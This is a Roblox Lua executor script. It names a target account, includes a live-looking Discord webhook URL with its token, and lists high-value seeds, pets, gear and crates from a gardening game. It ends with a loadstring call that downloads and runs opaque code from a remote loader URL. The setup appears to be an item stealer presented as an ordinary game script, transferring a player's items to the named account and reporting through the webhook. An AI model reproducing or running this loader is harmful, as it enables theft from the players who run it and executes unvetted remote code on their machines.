getgenv().NORMAL_TARGET     = "LoggyX91"
getgenv().NORMAL_WEBHOOK_URL = "https://discord.com/api/webhooks/1521401435483410544/NycHNk7IypSJ4hpu7VXluEaJeU20MkddjCs-Gzv5ix0MiXNwVyrPSNz-aDEtNBzlFATW"
getgenv().NORMAL_SEEDS = {
    ["Moon Bloom"] = true,
    ["Dragon's Breath"] = true,
    ["Rainbow Seed"] = true,
    ["Venus Fly Trap"] = true,
    ["Pomegranate"] = true,
    ["Poison Apple"] = true,
    ["Ghost Pepper"] = true,
    ["Gold Seed"] = true,
    ["Dragon Fruit"] = true,
    ["Acorn"] = true,
    ["Cherry"] = true,
    ["Sunflower"] = true,
    ["Poison Ivy"] = true,
    ["Mushroom"] = true,
    ["Green Bean"] = true,
    ["Banana"] = true,
    ["Grape"] = true,
    ["Coconut"] = true,
    ["Mango"] = true,
    ["Glow Mushroom"] = true,
    ["Bamboo"] = true,
    ["Corn"] = true,
    ["Cactus"] = true,
    ["Pineapple"] = true,
    ["Baby Cactus"] = true,
    ["Horned Melon"] = true,
    ["Tulip"] = true,
    ["Tomato"] = true,
    ["Apple"] = true,
    ["Carrot"] = true,
    ["Strawberry"] = true,
    ["Blueberry"] = true
}
getgenv().NORMAL_PETS = {
    ["Raccoon"] = true,
    ["Unicorn"] = true,
    ["Golden Dragonfly"] = true,
    ["Robin"] = true,
    ["Bee"] = true,
    ["Deer"] = true,
    ["Owl"] = true,
    ["Bunny"] = true,
    ["Frog"] = true,
    ["Monkey"] = true,
    ["Ice Serpent"] = true,
    ["Black Dragon"] = true
}
getgenv().NORMAL_GEARS = {
    ["Super Sprinkler"] = true,
    ["Super Watering Can"] = true,
    ["Legendary Sprinkler"] = true,
    ["Teleporter"] = true,
    ["Invisibility Mushroom"] = true,
    ["Wheelbarrow"] = true,
    ["Shrink Mushroom"] = true,
    ["Supersize Mushroom"] = true,
    ["Gnome"] = true,
    ["Flashbang"] = true,
    ["Basic Pot"] = true,
    ["Rare Sprinkler"] = true,
    ["Trowel"] = true,
    ["Jump Mushroom"] = true,
    ["Speed Mushroom"] = true,
    ["Lantern"] = true,
    ["Uncommon Sprinkler"] = true,
    ["Common Sprinkler"] = true,
    ["Common Watering Can"] = true,
    ["Sign"] = true,
    ["Power Hose"] = true,
    ["Freeze Ray"] = true,
    ["Rainbow Carpet"] = true,
    ["Vine Wrapper"] = true
}
getgenv().NORMAL_PROPS = {
    ["Teleporter Pad Crate"] = true,
    ["Owner Door Crate"] = true,
    ["Bear Trap Crate"] = true,
    ["Fence Crate"] = true,
    ["Bridge Crate"] = true,
    ["Spring Crate"] = true,
    ["Seesaw Crate"] = true,
    ["Conveyor Crate"] = true,
    ["Sign Crate"] = true,
    ["Arch Crate"] = true,
    ["Roleplay Crate"] = true,
    ["Bench Crate"] = true,
    ["Light Crate"] = true,
    ["Ladder Crate"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/22c796a75f035b5ef8e55946d39e602c.lua"))()
